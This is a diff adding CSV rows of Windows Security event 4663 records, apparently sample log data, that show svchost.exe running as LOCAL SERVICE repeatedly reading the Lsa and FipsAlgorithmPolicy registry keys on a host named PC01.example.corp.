+2019-03-20T03:35:15.205246+04:00,1553038515.205246,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452822
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.185218+04:00,1553038515.185218,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452821
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.185218+04:00,1553038515.185218,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452820
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452819
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452818
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452817
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452816
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452815
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452814
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:14.634426+04:00,1553038514.634426,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452813
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452922
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452921
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452920
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452919
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452918
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452917
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452916
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452915
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452914
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452913
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452912
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452911
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452910
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452909
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452908
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452907
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452906
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452905
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452904
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452903
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452902
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452901
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452900
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452899
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452898
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452897
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452896
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452895
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452894
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452893
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452892
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
